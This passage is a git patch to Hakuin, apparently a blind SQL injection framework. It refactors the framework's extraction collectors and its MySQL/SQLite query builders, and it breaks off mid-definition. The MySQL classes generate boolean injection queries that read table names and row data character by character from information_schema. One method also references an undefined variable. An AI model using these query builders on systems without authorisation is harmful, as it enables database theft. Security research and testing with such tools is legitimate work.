From 9932d8dacdb465b592430a8cc5db7685c7431553 Mon Sep 17 00:00:00 2001 From: Jakub Pruzinec Date: Wed, 4 Oct 2023 19:13:22 +0800 Subject: [PATCH] major refactoring (DBMS, collectors) & unicode support --- .gitignore | 3 +- hakuin/Extractor.py | 76 +++-- hakuin/Model.py | 7 +- hakuin/collectors.py | 612 +++++++++++++++++++++++------------- hakuin/dbms/DBMS.py | 89 ++++-- hakuin/dbms/MySQL.py | 449 +++++++++++++++++--------- hakuin/dbms/SQLite.py | 381 +++++++++++++++------- hakuin/search_algorithms.py | 65 ++-- hakuin/utils/__init__.py | 4 +- tests/OfflineRequester.py | 13 +- tests/dbs/unicode.json | 7 + tests/dbs/unicode.sqlite | Bin 0 -> 20480 bytes tests/test_large_content.py | 50 +-- tests/test_large_schema.py | 5 + tests/test_online.py | 18 +- tests/test_small_schema.py | 29 ++ tests/test_unicode.py | 28 ++ 17 files changed, 1214 insertions(+), 622 deletions(-) create mode 100644 tests/dbs/unicode.json create mode 100644 tests/dbs/unicode.sqlite create mode 100644 tests/test_small_schema.py create mode 100644 tests/test_unicode.py diff --git a/.gitignore b/.gitignore index 9c37282..0f85595 100644 --- a/.gitignore +++ b/.gitignore @@ -162,4 +162,5 @@ cython_debug/ #.idea/ # Hakuin -tmp/ \ No newline at end of file +tmp/ +demos/ diff --git a/hakuin/Extractor.py b/hakuin/Extractor.py index 97f53f1..8f81a5a 100644 --- a/hakuin/Extractor.py +++ b/hakuin/Extractor.py @@ -1,7 +1,6 @@ import hakuin import hakuin.search_algorithms as search_alg import hakuin.collectors as collect -from hakuin.utils import CHARSET_SCHEMA @@ -33,24 +32,23 @@ class Extractor: ctx = search_alg.Context(None, None, None, None) - n_rows = search_alg.IntExponentialSearch( - self.requester, - self.dbms.count_tables, - upper=8 + n_rows = search_alg.IntExponentialBinarySearch( + requester=self.requester, + query_cb=self.dbms.TablesQueries.rows_count, + upper=8, + find_range=True, ).run(ctx) if strategy == 'binary': return collect.BinaryTextCollector( - self.requester, - self.dbms.char_tables, - charset=CHARSET_SCHEMA, + requester=self.requester, + queries=self.dbms.TablesQueries, ).run(ctx, n_rows) else: return collect.ModelTextCollector( - self.requester, - self.dbms.char_tables, + requester=self.requester, + queries=self.dbms.TablesQueries, model=hakuin.get_model_tables(), - charset=CHARSET_SCHEMA, ).run(ctx, n_rows) @@ -70,24 +68,23 @@ class Extractor: ctx = search_alg.Context(table, None, None, None) - n_rows = search_alg.IntExponentialSearch( - self.requester, - self.dbms.count_columns, - upper=8 + n_rows = search_alg.IntExponentialBinarySearch( + requester=self.requester, + query_cb=self.dbms.ColumnsQueries.rows_count, + upper=8, + find_range=True, ).run(ctx) if strategy == 'binary': return collect.BinaryTextCollector( - self.requester, - self.dbms.char_columns, - charset=CHARSET_SCHEMA, + requester=self.requester, + queries=self.dbms.ColumnsQueries, ).run(ctx, n_rows) else: return collect.ModelTextCollector( - self.requester, - self.dbms.char_columns, + requester=self.requester, + queries=self.dbms.ColumnsQueries, model=hakuin.get_model_columns(), - charset=CHARSET_SCHEMA, ).run(ctx, n_rows) @@ -104,15 +101,15 @@ class Extractor: ctx = search_alg.Context(table, column, None, None) d_type = search_alg.BinarySearch( - self.requester, - self.dbms.meta_type, + requester=self.requester, + query_cb=self.dbms.MetaQueries.column_data_type, values=self.dbms.DATA_TYPES, ).run(ctx) return { 'type': d_type, - 'nullable': self.requester.request(ctx, self.dbms.meta_is_nullable(ctx)), - 'pk': self.requester.request(ctx, self.dbms.meta_is_pk(ctx)), + 'nullable': self.requester.request(ctx, self.dbms.MetaQueries.column_is_nullable(ctx)), + 'pk': self.requester.request(ctx, self.dbms.MetaQueries.column_is_pk(ctx)), } @@ -140,7 +137,7 @@ class Extractor: return schema - def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows=None, n_rows_guess=128): + def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128): '''Extracts text column. Params: @@ -152,7 +149,6 @@ class Extractor: 'dynamic' for dynamically choosing the best search strategy and opportunistically guessing strings charset (list|None): list of possible characters - n_rows (int|None): number of rows n_rows_guess (int|None): approximate number of rows when 'n_rows' is not set Returns: @@ -162,32 +158,30 @@ class Extractor: assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}' ctx = search_alg.Context(table, column, None, None) - - if n_rows is None: - n_rows = search_alg.IntExponentialSearch( - self.requester, - self.dbms.count_rows, - upper=n_rows_guess - ).run(ctx) + n_rows = search_alg.IntExponentialBinarySearch( + requester=self.requester, + query_cb=self.dbms.RowsQueries.rows_count, + upper=n_rows_guess, + find_range=True, + ).run(ctx) if strategy == 'binary': return collect.BinaryTextCollector( - self.requester, - self.dbms.char_rows, + requester=self.requester, + queries=self.dbms.RowsQueries, charset=charset, ).run(ctx, n_rows) elif strategy in ['unigram', 'fivegram']: ngram = 1 if strategy == 'unigram' else 5 return collect.AdaptiveTextCollector( - self.requester, - self.dbms.char_rows, + requester=self.requester, + queries=self.dbms.RowsQueries, model=hakuin.Model(ngram), charset=charset, ).run(ctx, n_rows) else: return collect.DynamicTextCollector( - self.requester, - self.dbms.char_rows, - self.dbms.string_rows, + requester=self.requester, + queries=self.dbms.RowsQueries, charset=charset, ).run(ctx, n_rows) diff --git a/hakuin/Model.py b/hakuin/Model.py index c2f6da8..d234c6b 100644 --- a/hakuin/Model.py +++ b/hakuin/Model.py @@ -26,8 +26,9 @@ class Model: @property def order(self): - assert self.model - return self.model.order + if self.model: + return self.model.order + return None def load(self, file): @@ -49,7 +50,7 @@ class Model: Returns: dict: likelihood distribution ''' - context = context[-(self.order - 1):] + context = [] if self.order == 1 else context[-(self.order - 1):] while context: scores = self._scores(context) diff --git a/hakuin/collectors.py b/hakuin/collectors.py index c27a653..6edb1cb 100644 --- a/hakuin/collectors.py +++ b/hakuin/collectors.py @@ -3,284 +3,544 @@ from abc import ABCMeta, abstractmethod from collections import Counter import hakuin -from hakuin.utils import tokenize, CHARSET_ASCII, EOS +from hakuin.utils import tokenize, CHARSET_ASCII, EOS, ASCII_MAX, UNICODE_MAX from hakuin.utils.huffman import make_tree -from hakuin.search_algorithms import Context, BinarySearch, TreeSearch +from hakuin.search_algorithms import Context, BinarySearch, TreeSearch, IntExponentialBinarySearch class Collector(metaclass=ABCMeta): '''Abstract class for collectors. Collectors repeatidly run - search algorithms to infer column rows. + search algorithms to extract column rows. ''' - def __init__(self, requester, query_cb): + def __init__(self, requester, queries): '''Constructor. Params: requester (Requester): Requester instance - query_cb (function): query construction function + queries (UniformQueries): injection queries ''' self.requester = requester - self.query_cb = query_cb + self.queries = queries - def run(self, ctx, n_rows): - '''Run collection. + def run(self, ctx, n_rows, *args, **kwargs): + '''Collects the whole column. Params: - ctx (Context): inference context + ctx (Context): extraction context n_rows (int): number of rows in column Returns: list: column rows ''' - logging.info(f'Inferring "{ctx.table}.{ctx.column}"...') + logging.info(f'Inferring "{ctx.table}.{ctx.column}"') data = [] for row in range(n_rows): ctx = Context(ctx.table, ctx.column, row, None) - res = self._collect_row(ctx) + res = self.collect_row(ctx, *args, **kwargs) data.append(res) - logging.info(f'({row + 1}/{n_rows}) inferred: {res}') + logging.info(f'({row + 1}/{n_rows}) "{ctx.table}.{ctx.column}": {res}') return data @abstractmethod - def _collect_row(self, ctx): + def collect_row(self, ctx, *args, **kwargs): + '''Collects a row. + + Params: + ctx (Context): extraction context + + Returns: + value: single row + ''' raise NotImplementedError() class TextCollector(Collector): '''Collector for text columns.''' - def _collect_row(self, ctx): + def __init__(self, requester, queries, charset=None): + '''Constructor. + + Params: + requester (Requester): Requester instance + queries (UniformQueries): injection queries + charset (list|None): list of possible characters, None for default ASCII + ''' + super().__init__(requester, queries) + self.charset = charset if charset is not None else CHARSET_ASCII + if EOS not in self.charset: + self.charset.append(EOS) + + + def run(self, ctx, n_rows): + '''Collects the whole column. + + Params: + ctx (Context): extraction context + n_rows (int): number of rows in column + + Returns: + list: column rows + ''' + rows_are_ascii = self.check_rows_are_ascii(ctx) + return super().run(ctx, n_rows, rows_are_ascii) + + + def collect_row(self, ctx, rows_are_ascii): + '''Collects a row. + + Params: + ctx (Context): extraction context + rows_are_ascii (bool): ASCII flag for all rows in column + + Returns: + string: single row + ''' + row_is_ascii = True if rows_are_ascii else self.check_row_is_ascii(ctx) + ctx.s = '' while True: - c = self._collect_char(ctx) + c = self.collect_char(ctx, row_is_ascii) if c == EOS: return ctx.s ctx.s += c @abstractmethod - def _collect_char(self, ctx): + def collect_char(self, ctx, row_is_ascii): + '''Collects a character. + + Params: + ctx (Context): extraction context + row_is_ascii (bool): row ASCII flag + + Returns: + string: single character + ''' raise NotImplementedError() + def check_rows_are_ascii(self, ctx): + '''Finds out whether all rows in column are ASCII. + + Params: + ctx (Context): extraction context + + Returns: + bool: ASCII flag + ''' + query = self.queries.rows_are_ascii(ctx) + return self.requester.request(ctx, query) + + + def check_row_is_ascii(self, ctx): + '''Finds out whether current row is ASCII. + + Params: + ctx (Context): extraction context + + Returns: + bool: ASCII flag + ''' + query = self.queries.row_is_ascii(ctx) + return self.requester.request(ctx, query) + + + def check_char_is_ascii(self, ctx): + '''Finds out whether current character is ASCII. + + Params: + ctx (Context): extraction context + + Returns: + bool: ASCII flag + ''' + query = self.queries.char_is_ascii(ctx) + return self.requester.request(ctx, query) + + class BinaryTextCollector(TextCollector): '''Binary search text collector''' - def __init__(self, requester, query_cb, charset=None): - '''Constructor. + def collect_char(self, ctx, row_is_ascii): + '''Collects a character. Params: - requester (Requester): Requester instance - query_cb (function): query construction function - charset (list|None): list of possible characters + ctx (Context): extraction context + row_is_ascii (bool): row ASCII flag Returns: - list: column rows + string: single character ''' - super().__init__(requester, query_cb) - self.charset = charset if charset else CHARSET_ASCII + return self._collect_or_emulate_char(ctx, row_is_ascii)[0] - def _collect_char(self, ctx): - return BinarySearch( - self.requester, - self.query_cb, - values=self.charset, - ).run(ctx) + def emulate_char(self, ctx, row_is_ascii, correct): + '''Emulates character collection without sending requests. + + Params: + ctx (Context): extraction context + row_is_ascii (bool): row ASCII flag + correct (str): correct character + + Returns: + int: number of requests necessary + ''' + return self._collect_or_emulate_char(ctx, row_is_ascii, correct)[1] + + + def _collect_or_emulate_char(self, ctx, row_is_ascii, correct=None): + total_queries = 0 + + # custom charset or ASCII + if self.charset is not CHARSET_ASCII or row_is_ascii or self._check_or_emulate_char_is_ascii(ctx, correct): + search_alg = BinarySearch( + requester=self.requester, + query_cb=self.queries.char, + values=self.charset, + correct=correct, + ) + res = search_alg.run(ctx) + total_queries += search_alg.n_queries + + if res is not None: + return res, total_queries + + # Unicode + correct_ord = ord(correct) if correct is not None else correct + search_alg = IntExponentialBinarySearch( + requester=self.requester, + query_cb=self.queries.char_unicode, + lower=ASCII_MAX + 1, + upper=UNICODE_MAX + 1, + find_range=False, + correct=correct_ord, + ) + res = search_alg.run(ctx) + total_queries += search_alg.n_queries + + return chr(res), total_queries + + + def _check_or_emulate_char_is_ascii(self, ctx, correct): + if correct is None: + return self.check_char_is_ascii(ctx) + return correct.isascii() class ModelTextCollector(TextCollector): '''Language model-based text collector.''' - def __init__(self, requester, query_cb, model, charset=None): + def __init__(self, requester, queries, model, charset=None): '''Constructor. Params: requester (Requester): Requester instance - query_cb (function): query construction function + queries (UniformQueries): injection queries model (Model): language model charset (list|None): list of possible characters Returns: list: column rows ''' - super().__init__(requester, query_cb) + super().__init__(requester, queries, charset) self.model = model - self.charset = charset if charset else CHARSET_ASCII + self.binary_collector = BinaryTextCollector( + requester=self.requester, + queries=self.queries, + charset=self.charset, + ) - def _collect_char(self, ctx): + def collect_char(self, ctx, row_is_ascii): + '''Collects a character. + + Params: + ctx (Context): extraction context + row_is_ascii (bool): row ASCII flag + + Returns: + string: single character + ''' + return self._collect_or_emulate_char(ctx, row_is_ascii)[0] + + + def emulate_char(self, ctx, row_is_ascii, correct): + '''Emulates character collection without sending requests. + + Params: + ctx (Context): extraction context + row_is_ascii (bool): row ASCII flag + correct (str): correct character + + Returns: + int: number of requests necessary + ''' + return self._collect_or_emulate_char(ctx, row_is_ascii, correct)[1] + + + def _collect_or_emulate_char(self, ctx, row_is_ascii, correct=None): + n_queries_model = 0 + model_ctx = tokenize(ctx.s, add_eos=False) scores = self.model.scores(context=model_ctx) - c = TreeSearch( - self.requester, - self.query_cb, + search_alg = TreeSearch( + requester=self.requester, + query_cb=self.queries.char, tree=make_tree(scores), - ).run(ctx) + correct=correct, + ) + res = search_alg.run(ctx) + n_queries_model = search_alg.n_queries - if c is not None: - return c + if res is not None: + return res, n_queries_model - charset = list(set(self.charset).difference(set(scores))) - return BinarySearch( - self.requester, - self.query_cb, - values=self.charset, - ).run(ctx) + res, n_queries_binary = self.binary_collector._collect_or_emulate_char(ctx, row_is_ascii, correct) + return res, n_queries_model + n_queries_binary class AdaptiveTextCollector(ModelTextCollector): '''Same as ModelTextCollector but adapts the model.''' - def _collect_char(self, ctx): - c = super()._collect_char(ctx) + def collect_char(self, ctx): + c = super().collect_char(ctx, correct) self.model.fit_correct_char(c, partial_str=ctx.s) return c +class DynamicTextStats: + '''Helper class of DynamicTextCollector to keep track of statistical information.''' + def __init__(self): + self.str_len_mean = 0.0 + self.n_strings = 0 + self._rpc = { + 'binary': {'mean': 0.0, 'hist': []}, + 'unigram': {'mean': 0.0, 'hist': []}, + 'fivegram': {'mean': 0.0, 'hist': []}, + } + + + def update_str(self, s): + self.n_strings += 1 + self.str_len_mean = (self.str_len_mean * (self.n_strings - 1) + len(s)) / self.n_strings + + + def update_rpc(self, strategy, n_queries): + rpc = self._rpc[strategy] + rpc['hist'].append(n_queries) + rpc['hist'] = rpc['hist'][-100:] + rpc['mean'] = sum(rpc['hist']) / len(rpc['hist']) + + + def rpc(self, strategy): + return self._rpc[strategy]['mean'] + + + def best_strategy(self): + return min(self._rpc, key=lambda strategy: self.rpc(strategy)) + + + class DynamicTextCollector(TextCollector): '''Dynamic text collector. The collector keeps statistical information (RPC) for several strategies (binary search, unigram, and five-gram) and dynamically chooses the best one. In addition, it uses the statistical information to identify when guessing whole strings is likely to succeed and then uses previously inferred strings to make the guesses. + ''' + def __init__(self, requester, queries, charset=None): + '''Constructor. - Attributes: - GUESS_TH (float): success probability threshold necessary to make guesses - GUESS_SCORE_TH (float): minimal necessary probability to be included in guess tree + Params: + requester (Requester): Requester instance + queries (UniformQueries): injection queries + charset (list|None): list of possible characters + + Other Attributes: + model_unigram (Model): adaptive unigram model + model_fivegram (Model): adaptive five-gram model + guess_collector (StringGuessCollector): collector for guessing + ''' + super().__init__(requester, queries, charset) + self.binary_collector = BinaryTextCollector( + requester=self.requester, + queries=self.queries, + charset=self.charset, + ) + self.unigram_collector = ModelTextCollector( + requester=self.requester, + queries=self.queries, + model=hakuin.Model(1), + charset=self.charset, + ) + self.fivegram_collector = ModelTextCollector( + requester=self.requester, + queries=self.queries, + model=hakuin.Model(5), + charset=self.charset, + ) + self.guess_collector = StringGuessingCollector( + requester=self.requester, + queries=self.queries, + ) + self.stats = DynamicTextStats() + + + def collect_row(self, ctx, rows_are_ascii): + row_is_ascii = True if rows_are_ascii else self.check_row_is_ascii(ctx) + + s = self._collect_string(ctx, row_is_ascii) + self.guess_collector.model.fit_single(s, context=[]) + self.stats.update_str(s) + + return s + + + def _collect_string(self, ctx, row_is_ascii): + '''Tries to guess strings or extracts them on per-character basis if guessing fails''' + exp_c = self.stats.str_len_mean * self.stats.rpc(self.stats.best_strategy()) + correct_str = self.guess_collector.collect_row(ctx, exp_c) + + if correct_str is not None: + self._update_stats_str(ctx, row_is_ascii, correct_str) + self.unigram_collector.model.fit_data([correct_str]) + self.fivegram_collector.model.fit_data([correct_str]) + return correct_str + + return self._collect_string_per_char(ctx, row_is_ascii) + + + def _collect_string_per_char(self, ctx, row_is_ascii): + ctx.s = '' + while True: + c = self.collect_char(ctx, row_is_ascii) + self._update_stats(ctx, row_is_ascii, c) + self.unigram_collector.model.fit_correct_char(c, partial_str=ctx.s) + self.fivegram_collector.model.fit_correct_char(c, partial_str=ctx.s) + + if c == EOS: + return ctx.s + ctx.s += c + + return ctx.s + + + def collect_char(self, ctx, row_is_ascii): + '''Chooses the best strategy and uses it to infer a character.''' + best = self.stats.best_strategy() + # print(f'b: {self.stats.rpc("binary")}, u: {self.stats.rpc("unigram")}, f: {self.stats.rpc("fivegram")}') + if best == 'binary': + return self.binary_collector.collect_char(ctx, row_is_ascii) + elif best == 'unigram': + return self.unigram_collector.collect_char(ctx, row_is_ascii) + else: + return self.fivegram_collector.collect_char(ctx, row_is_ascii) + + + def _update_stats(self, ctx, row_is_ascii, correct): + '''Emulates all strategies without sending requests and updates the statistical information.''' + collectors = ( + ('binary', self.binary_collector), + ('unigram', self.unigram_collector), + ('fivegram', self.fivegram_collector), + ) + + for strategy, collector in collectors: + n_queries = collector.emulate_char(ctx, row_is_ascii, correct) + self.stats.update_rpc(strategy, n_queries) + + + def _update_stats_str(self, ctx, row_is_ascii, correct_str): + '''Like _update_stats but for whole strings.''' + ctx.s = '' + for c in correct_str: + self._update_stats(ctx, row_is_ascii, c) + ctx.s += c + + + +class StringGuessingCollector(Collector): + '''String guessing collector. The collector keeps track of previously extracted + strings and opportunistically tries to guess new strings. ''' GUESS_TH = 0.5 GUESS_SCORE_TH = 0.01 - def __init__(self, requester, query_char_cb, query_string_cb, charset=None): + def __init__(self, requester, queries): '''Constructor. Params: requester (Requester): Requester instance - query_char_cb (function): query construction function for searching characters - query_string_cb (function): query construction function for searching strings - charset (list|None): list of possible characters + queries (UniformQueries): injection queries Other Attributes: - model_guess: adaptive string-based model for guessing - model_unigram: adaptive unigram model - model_fivegram: adaptive five-gram model + GUESS_TH (float): minimal threshold necessary to start guessing + GUESS_SCORE_TH (float): minimal threshold for strings to be eligible for guessing + model (Model): adaptive string-based model for guessing ''' - self.requester = requester - self.query_char_cb = query_char_cb - self.query_string_cb = query_string_cb - self.charset = charset if charset else CHARSET_ASCII - self.model_guess = hakuin.Model(1) - self.model_unigram = hakuin.Model(1) - self.model_fivegram = hakuin.Model(5) - self._stats = { - 'rpc': { - 'binary': {'avg': 0.0, 'hist': []}, - 'unigram': {'avg': 0.0, 'hist': []}, - 'fivegram': {'avg': 0.0, 'hist': []}, - }, - 'avg_len': 0.0, - 'n_strings': 0, - } + super().__init__(requester, queries) + self.model = hakuin.Model(1) - def _collect_row(self, ctx): - s = self._collect_string(ctx) - self.model_guess.fit_single(s, context=[]) + def collect_row(self, ctx, exp_alt=None): + '''Tries to construct a guessing Huffman tree and searches it in case of success. - self._stats['n_strings'] += 1 + Params: + ctx (Context): extraction context + exp_alt (float|None): expectation for alternative extraction method or None if it does not exist - total = self._stats['avg_len'] * (self._stats['n_strings'] - 1) + len(s) - self._stats['avg_len'] = total / self._stats['n_strings'] - return s - - - def _collect_string(self, ctx): - '''Identifies if guessings strings is likely to succeed and if yes, it makes guesses. - If guessing does not take place or fails, it proceeds with per-character inference. + Returns: + string|None: guessed string or None if skipped or failed ''' - correct_str = self._try_guessing(ctx) - - if correct_str is not None: - self._update_stats_str(ctx, correct_str) - self.model_unigram.fit_data([correct_str]) - self.model_fivegram.fit_data([correct_str]) - return correct_str - - ctx.s = '' - while True: - c = self._collect_char(ctx) - - self._update_stats(ctx, c) - self.model_unigram.fit_correct_char(c, partial_str=ctx.s) - self.model_fivegram.fit_correct_char(c, partial_str=ctx.s) - - if c == EOS: - return ctx.s - - ctx.s += c - - - def _collect_char(self, ctx): - '''Chooses the best strategy and uses it to infer a character.''' - searched_space = set() - c = self._get_strategy(ctx, searched_space, self._best_strategy()).run(ctx) - if c is None: - c = self._get_strategy(ctx, searched_space, 'binary').run(ctx) - return c - - - def _try_guessing(self, ctx): - '''Tries to construct a guessing Huffman tree and searches it in case of success.''' - tree = self._get_guess_tree(ctx) + exp_alt = exp_alt if exp_alt is not None else float('inf') + tree = self._get_guess_tree(ctx, exp_alt) return TreeSearch( - self.requester, - self.query_string_cb, + requester=self.requester, + query_cb=self.queries.string, tree=tree, ).run(ctx) - def _get_guess_tree(self, ctx): + def _get_guess_tree(self, ctx, exp_alt): '''Identifies, whether string guessing is likely to succeed and if so, it constructs a Huffman tree from previously inferred strings. + Params: + ctx (Context): extraction context + exp_alt (float): expectation for alternative extraction method + Returns: - utils.huffman.Node|None: Huffman tree constructed from previously inferred - strings that are likely to succeed or None if no such strings were found + utils.huffman.Node|None: Huffman tree constructed from previously inferred strings that are + likely to succeed or None if no such strings were found ''' - - # Expectation for per-character inference: - # exp_c = avg_len * best_strategy_rpc - exp_c = self._stats['avg_len'] * self._stats['rpc'][self._best_strategy()]['avg'] - # Iteratively compute the best expectation "best_exp_g" by progressively inserting guess # strings into a candidate guess set "guesses" and computing their expectation "exp_g". # The iteration stops when the minimal "exp_g" is found. - # exp(G) = p(s in G) * exp_huff(G) + (1 - p(c in G)) * (exp_huff(G) + exp_c) + # exp(G) = p(s in G) * exp_huff(G) + (1 - p(c in G)) * (exp_huff(G) + exp_alt) guesses = {} prob_g = 0.0 best_prob_g = 0.0 best_exp_g = float('inf') best_tree = None - scores = self.model_guess.scores(context=[]) - scores = {k: v for k, v in scores.items() if v >= self.GUESS_SCORE_TH and self.model_guess.count(k, []) > 1} + scores = self.model.scores(context=[]) + scores = {k: v for k, v in scores.items() if v >= self.GUESS_SCORE_TH and self.model.count(k, []) > 1} for guess, score in sorted(scores.items(), key=lambda x: x[1], reverse=True): guesses[guess] = score tree = make_tree(guesses) tree_cost = tree.search_cost() prob_g += score - exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_c) + exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_alt) if exp_g > best_exp_g: break @@ -289,83 +549,7 @@ class DynamicTextCollector(TextCollector): best_exp_g = exp_g best_tree = tree - if best_exp_g > exp_c or best_prob_g < self.GUESS_TH: - return None + if best_exp_g <= exp_alt and best_prob_g > self.GUESS_TH: + return best_tree - return best_tree - - - def _best_strategy(self): - '''Returns the name of the best strategy.''' - return min(self._stats['rpc'], key=lambda strategy: self._stats['rpc'][strategy]['avg']) - - - def _update_stats(self, ctx, correct): - '''Emulates all strategies without sending any requests and updates the - statistical information. - ''' - for strategy in self._stats['rpc']: - searched_space = set() - search_alg = self._get_strategy(ctx, searched_space, strategy, correct) - res = search_alg.run(ctx) - n_queries = search_alg.n_queries - if res is None: - binary_search = self._get_strategy(ctx, searched_space, 'binary', correct) - binary_search.run(ctx) - n_queries += binary_search.n_queries - - m = self._stats['rpc'][strategy] - m['hist'].append(n_queries) - m['hist'] = m['hist'][-100:] - m['avg'] = sum(m['hist']) / len(m['hist']) - - - def _update_stats_str(self, ctx, correct_str): - '''Like _update_stats but for whole strings''' - ctx.s = '' - for c in correct_str: - self._update_stats(ctx, c) - ctx.s += c - - - def _get_strategy(self, ctx, searched_space, strategy, correct=None): - '''Builds search algorithm configured to search appropriate space. - - Params: - ctx (Context): inference context - searched_space (list): list of values that have already been searched - strategy (str): strategy ('binary', 'unigram', 'fivegram') - correct (str|None): correct character - - Returns: - SearchAlgorithm: configured search algorithm - ''' - if strategy == 'binary': - charset = list(set(self.charset).difference(searched_space)) - return BinarySearch( - self.requester, - self.query_char_cb, - values=self.charset, - correct=correct, - ) - elif strategy == 'unigram': - scores = self.model_unigram.scores(context=[]) - searched_space.union(set(scores)) - return TreeSearch( - self.requester, - self.query_char_cb, - tree=make_tree(scores), - correct=correct, - ) - else: - model_ctx = tokenize(ctx.s, add_eos=False) - model_ctx = model_ctx[-(self.model_fivegram.order - 1):] - scores = self.model_fivegram.scores(context=model_ctx) - - searched_space.union(set(scores)) - return TreeSearch( - self.requester, - self.query_char_cb, - tree=make_tree(scores), - correct=correct, - ) + return None diff --git a/hakuin/dbms/DBMS.py b/hakuin/dbms/DBMS.py index 28ee8c4..5d77aba 100644 --- a/hakuin/dbms/DBMS.py +++ b/hakuin/dbms/DBMS.py @@ -3,54 +3,75 @@ from abc import ABCMeta, abstractmethod -class DBMS(metaclass=ABCMeta): - RE_NORM = re.compile(r'[ \n]+') - - DATA_TYPES = [] - +class Queries(metaclass=ABCMeta): + '''Class for constructing SQL queries.''' + _RE_NORMALIZE = re.compile(r'[ \n]+') @staticmethod def normalize(s): - return DBMS.RE_NORM.sub(' ', s).strip() + return Queries._RE_NORMALIZE.sub(' ', s).strip() + @staticmethod + def hex(s): + return s.encode("utf-8").hex() + + + +class MetaQueries(Queries): + '''Interface for queries that infer DB metadata.''' @abstractmethod - def count_rows(self, ctx, n): - raise NotImplementedError() - + def column_data_type(self, ctx, values): raise NotImplementedError() @abstractmethod - def count_tables(self, ctx, n): - raise NotImplementedError() - + def column_is_nullable(self, ctx): raise NotImplementedError() @abstractmethod - def count_columns(self, ctx, n): - raise NotImplementedError() + def column_is_pk(self, ctx): raise NotImplementedError() - @abstractmethod - def meta_type(self, ctx, values): - raise NotImplementedError() - @abstractmethod - def meta_is_nullable(self, ctx): - raise NotImplementedError() +class UniformQueries(Queries): + '''Interface for queries that can be unified.''' @abstractmethod - def meta_is_pk(self, ctx): - raise NotImplementedError() + def rows_count(self, ctx): raise NotImplementedError() + @abstractmethod + def rows_are_ascii(self, ctx): raise NotImplementedError() + @abstractmethod + def row_is_ascii(self, ctx): raise NotImplementedError() + @abstractmethod + def char_is_ascii(self, ctx): raise NotImplementedError() + @abstractmethod + def char(self, ctx): raise NotImplementedError() + @abstractmethod + def char_unicode(self, ctx): raise NotImplementedError() + @abstractmethod + def string(self, ctx, values): raise NotImplementedError() - @abstractmethod - def char_rows(self, ctx, values): - raise NotImplementedError() - @abstractmethod - def char_tables(self, ctx, values): - raise NotImplementedError() - @abstractmethod - def char_columns(self, ctx, values): - raise NotImplementedError() +class DBMS(metaclass=ABCMeta): + '''Database Management System (DBMS) interface. - @abstractmethod - def string_rows(self, ctx, values): - raise NotImplementedError() + Attributes: + DATA_TYPES (list): all data types available + MetaQueries (MetaQueries): queries of metadata extraction + TablesQueries (UniformQueries): queries for table names extraction + ColumnsQueries (UniformQueries): queries for column names extraction + RowsQueries (UniformQueries): queries for rows extraction + ''' + _RE_ESCAPE = re.compile(r'[a-zA-Z0-9_#@]+') + + DATA_TYPES = [] + + MetaQueries = None + TablesQueries = None + ColumnsQueries = None + RowsQueries = None + + + @staticmethod + def escape(s): + if DBMS._RE_ESCAPE.match(s): + return s + assert ']' not in s, f'Cannot escape "{s}"' + return f'[{s}]' diff --git a/hakuin/dbms/MySQL.py b/hakuin/dbms/MySQL.py index 292e7ad..012f975 100644 --- a/hakuin/dbms/MySQL.py +++ b/hakuin/dbms/MySQL.py @@ -1,9 +1,298 @@ -from hakuin.utils import EOS +from hakuin.utils import EOS, ASCII_MAX -from .DBMS import DBMS +from .DBMS import DBMS, MetaQueries, UniformQueries +class MySQLMetaQueries(MetaQueries): + def column_data_type(self, ctx, values): + values = [f"'{v}'" for v in values] + query = f''' + SELECT lower(DATA_TYPE) in ({','.join(values)}) + FROM information_schema.columns + WHERE TABLE_SCHEMA=database() AND + TABLE_NAME=x'{self.hex(ctx.table)}' AND + COLUMN_NAME=x'{self.hex(ctx.column)}' + ''' + return self.normalize(query) + + + def column_is_nullable(self, ctx): + query = f''' + SELECT IS_NULLABLE='YES' + FROM information_schema.columns + WHERE TABLE_SCHEMA=database() AND + TABLE_NAME=x'{self.hex(ctx.table)}' AND + COLUMN_NAME=x'{self.hex(ctx.column)}' + ''' + return self.normalize(query) + + + def column_is_pk(self, ctx): + query = f''' + SELECT COLUMN_KEY='PRI' + FROM information_schema.columns + WHERE TABLE_SCHEMA=database() AND + TABLE_NAME=x'{self.hex(ctx.table)}' AND + COLUMN_NAME=x'{self.hex(ctx.column)}' + ''' + return self.normalize(query) + + + +class MySQLTablesQueries(UniformQueries): + def rows_count(self, ctx, n): + query = f''' + SELECT count(*) < {n} + FROM information_schema.TABLES + WHERE TABLE_SCHEMA=database() + ''' + return self.normalize(query) + + + def rows_are_ascii(self, ctx): + # min() simulates the logical ALL operator here + query = f''' + SELECT min(TABLE_NAME = CONVERT(TABLE_NAME using ASCII)) + FROM information_schema.TABLES + WHERE TABLE_SCHEMA=database() + ''' + return self.normalize(query) + + + def row_is_ascii(self, ctx): + query = f''' + SELECT TABLE_NAME = CONVERT(TABLE_NAME using ASCII) + FROM information_schema.TABLES + WHERE TABLE_SCHEMA=database() + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char_is_ascii(self, ctx): + query = f''' + SELECT ord(convert(substr(TABLE_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1} + FROM information_schema.TABLES + WHERE TABLE_SCHEMA=database() + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char(self, ctx, values): + has_eos = EOS in values + values = [v for v in values if v != EOS] + values = ''.join(values).encode('utf-8').hex() + + if has_eos: + query = f''' + SELECT locate(substr(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}') + FROM information_schema.TABLES + WHERE TABLE_SCHEMA=database() + LIMIT 1 + OFFSET {ctx.row} + ''' + else: + query = f''' + SELECT char_length(TABLE_NAME) != {len(ctx.s)} AND + locate(substr(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}') + FROM information_schema.TABLES + WHERE TABLE_SCHEMA=database() + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char_unicode(self, ctx, n): + query = f''' + SELECT ord(convert(substr(TABLE_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {n} + FROM information_schema.TABLES + WHERE TABLE_SCHEMA=database() + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def string(self, ctx): + raise NotImplementedError('TODO?') + + + +class 